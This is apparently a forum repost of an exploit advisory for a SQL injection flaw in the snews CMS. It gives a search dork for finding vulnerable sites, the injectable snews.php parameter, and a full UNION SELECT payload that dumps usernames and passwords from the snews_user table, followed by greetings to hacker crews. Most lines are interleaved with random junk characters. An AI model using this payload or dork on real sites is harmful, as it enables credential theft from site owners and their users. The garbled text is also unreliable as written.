标题: CMS snews SQL Injection Vulnerability
4 s l; v f% ~3 l' j0 u作者: By onestree* |' @) r; X# S& L$ I+ u3 ~+ A* w
下载地址 : http://snewscms.com/7 S8 S p0 _, l8 E3 E5 V8 m
测试平台 : ubuntu 12.10 / win 7
$ Y& w5 D; f) V v0 c- y关键词: inurl:"tanyakan pada rumput yang bergoyang"7 v N j B8 [
- v3 \' r' R3 s4 A
% ?5 t0 I# q$ }( {5 l( \2 h*************************************************************
$ ?1 W' b( k8 |+ ?% R% C8 l 3 Y9 x9 C3 U8 t$ T6 A/ J$ ?
SQL poc:, N8 X1 V- ^/ q' O5 _ d7 G2 l
: p! a2 _) H1 o! K6 j# F
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]' {& n2 u7 r# F$ ^4 x% u
! |0 g) Z7 L- r. ?. l
示例. Z/ N4 O3 r3 B) c) `& M7 q
! f' c9 e- z+ h# a! Thttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*+ y" K6 x/ X2 c. n
# b" u/ g2 ^/ l- @; u 3 B2 @. y8 t! U& N
致谢:$ Z9 k% z. [2 E k! ^
/ ]' B) h! ?+ k* r1 ~7 t A, O' @% _ Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
8 z2 A1 r: N& d6 g' H
$ `& g2 c/ C# M9 x# ^: i) n# c) x5 [ indonesiancoder - moeslimh4x0r - go-coder) r. z7 v1 e( K7 h# e
; J" i D$ z( j {6 Z: Xspesial my hunny :** }$ |' s' H$ m5 h1 u
|
发表于 2013-1-23 08:55:06
收藏
支持
反对